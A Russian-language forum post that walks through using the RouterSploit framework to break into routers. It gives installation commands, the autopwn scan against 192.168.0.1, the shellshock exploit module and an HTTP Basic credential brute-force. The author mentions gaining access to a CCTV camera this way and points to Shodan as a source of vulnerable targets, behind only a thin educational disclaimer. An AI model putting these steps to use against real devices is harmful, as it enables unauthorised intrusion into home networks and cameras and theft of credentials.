РКН RouterSploit - как взломать сеть

4IXIPO

Новичок
Статус
offline
Регистрация
13.08.2019
Сообщения
24
Репутация
3
⁣Telegram
В этом статье вы узнаете информацию по выявлению уязвимостей маршрутизаторов - RouterSploit. Этот инструмент создан по образцу Metasploit, и вы найдете много общего; однако Routersploit специализируется на взломе маршрутизаторов. Подобный взлом мне удалось осуществить на одном из моментов для подключения к камере видеонаблюдения .

563cb6a9f80fd5d97907c.png



ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: это образовательная статья, предназначенная для ознакомления. Не используйте этот инструмент во вред, т.к. добром это не кончится.

Требования к routersploit
  • Python
  • доступ к интернету
  • знание командной строки
  • Установка RouterSploit в Kali Linux
Шаг 1. Установка routersploit
Чтобы установить routersploit в Kali Linux, откройте терминал и введите следующие команды в том же порядке, что и ниже:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

da696a9835e20bd99f49d.png



Шаг 2: Запуск RouterSploit
Для запуска routersploit требуется перейти в директорию этого инструмента и выполнить следующее:

python3 rsf.py

66cb0bcc9809b1c1a4cf6.png



Если вы хотите увидеть все возможные эксплойты, просто введите следующее:

show all
1b5fa3679049d53ad0958.png



Теперь давайте начнем со сканирования маршрутизатора и выяснения, есть ли в нем какие-либо уязвимости.

Шаг 3: сканирование цели
Чтобы просканировать маршрутизатор на предмет всех возможных эксплойтов, мы будем использовать модуль сканера Autopwn, чтобы найти любые уязвимости, которые влияют на наш целевой маршрутизатор. Но сначала вам нужно найти IP-адрес целевого маршрутизатора. Я буду показывать на примере своего.
daa25cd8603e62cb9bb33.png



По умолчанию многие маршрутизаторы используют 192.168.0.1. или 192.168.1.1. И для сканирования цели нужно ввести следующее:

use scanners/auto pawn
show options
94ee0f097497aa1a92ca9.png



В нашем случае мы установим цель на IP-адрес маршрутизатора 192.168.0.1. Введите «set target», затем IP-адрес маршрутизатора, после клавишу enter. Затем, введите run, чтобы начать сканирование.

set target 192.168.0.1
run
3236f0681cf8c55f68685.png



Шаг 4: Выбор и настройка эксплойта маршрутизатора
После завершения сканирования мы увидим все уязвимости, влияющие на маршрутизатор.

Начнем с простого эксплойта. Воспользуемся эксплойтом shellshock; введем следующие команды.

use exploits/generic/shellshock
show options

Вы сможете установить цель, набрав:
e6f6670900dcc3e862a9e.png



set target <target router IP>

Шаг 5: Запуск эксплойта
Вы можете выполнить полезную нагрузку, набрав run .

Если эксплойт будет успешным, вас встретят внутренние параметры конфигурации и пароли, а также имена пользователей, которые можно использовать для взлома и управления маршрутизатором.

Эти эксплойты могут привести к утечке логина и пароля пользователей, паролей по умолчанию (например, admin), серийных номеров устройств и т.д.

Например, если вы хотите подобрать и взломать имя пользователя и пароль маршрутизатора, введите следующие команды:
23a7e37022475da6a8f68.png



use creds/http_basic_bruteforce
rsf (HTTP Basic Bruteforce) > show options
set target 192.168.0.2
run
36bbd4aec66ce8fabe445.png



В Shodan можно встретить массу уязвимых устройств, к которым без особых проблем можно получить доступ

088a199befd09827c513e.png



Однако на практике с реальным внешним IP адресом я не буду это демонстрировать, дабы оградить неокрепшие умы от неправомерного доступа.